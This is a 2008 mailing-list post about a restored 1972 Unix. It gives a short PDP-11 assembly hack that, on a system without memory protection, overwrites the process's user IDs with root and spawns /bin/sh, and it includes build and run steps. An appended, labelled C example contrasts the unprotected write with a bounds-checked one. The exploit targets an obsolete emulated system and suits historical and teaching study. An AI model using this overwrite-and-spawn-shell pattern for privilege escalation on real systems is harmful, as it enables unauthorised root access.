[Unix-jun72] another small hack

Tim Newsham newsham at lava.net
Sun May 11 04:37:33 AEST 2008


No memory protection:

.. = 40014
         mov     $0,037772 / u.uid = 0, u.ruid = 0
         sys     exec; shell; shellp
         sys     exit

shell:  </bin/sh\0>
shellm: <-\0>
shellp: shellm
         0

-----
$ APOUT_ROOT=../fs/root ../tools/apout/apout ../fs/root/bin/as hack.s
$ ../tools/fixaout.py
$ mv b.out hack
... put it on your rk0 as /bin/hack, log in as bin, run "hack".

Tim Newsham
http://www.thenewsh.com/~newsham/
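
The premise of the post above ("No memory protection"), modelled as an added example that is not part of the original message: a flat 64 KiB core where a user-mode word store to 037772 clears both ID bytes, next to the same store behind a base/limit check that traps instead. Assumptions: user core starts at 040000 (inferred from ".. = 40014"), u.uid is the low byte and u.ruid the high byte of that word, the starting uid value 3 is constructed, and store_word_checked is a hypothetical check, not code from the system discussed.

```c
#include <stdint.h>
#include <stdio.h>

#define CORE_SIZE  0200000u  /* 64 KiB flat address space */
#define USER_BASE  040000u   /* assumed start of user core (from ".. = 40014") */
#define U_UID_ADDR 037772u   /* word written by the post: u.uid, u.ruid */

static uint8_t core[CORE_SIZE];

/* Unprotected store: 16-bit word, little-endian (PDP-11 byte order). */
int store_word_flat(uint16_t addr, uint16_t val) {
    core[addr] = (uint8_t)(val & 0xff);
    core[(uint16_t)(addr + 1)] = (uint8_t)(val >> 8);
    return 0;
}

/* Hypothetical protected store: a user-mode access outside
 * [USER_BASE, CORE_SIZE) is refused (-1) and memory is left untouched. */
int store_word_checked(uint16_t addr, uint16_t val) {
    if (addr < USER_BASE || addr > CORE_SIZE - 2)
        return -1;
    return store_word_flat(addr, val);
}

/* Kernel-side helpers for the two one-byte ID fields (assumed layout). */
void set_ids(uint8_t uid, uint8_t ruid) {
    core[U_UID_ADDR] = uid;
    core[U_UID_ADDR + 1] = ruid;
}
int cur_uid(void)  { return core[U_UID_ADDR]; }
int cur_ruid(void) { return core[U_UID_ADDR + 1]; }

int main(void) {
    set_ids(3, 3);  /* constructed non-root IDs */

    int r = store_word_checked(U_UID_ADDR, 0);
    printf("checked store: rc=%d uid=%d ruid=%d\n", r, cur_uid(), cur_ruid());

    r = store_word_flat(U_UID_ADDR, 0);
    printf("flat store:    rc=%d uid=%d ruid=%d\n", r, cur_uid(), cur_ruid());
    return 0;
}
```

A single word store covers both one-byte fields, which is why the one `mov` in the post is enough to change the effective and real IDs together.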


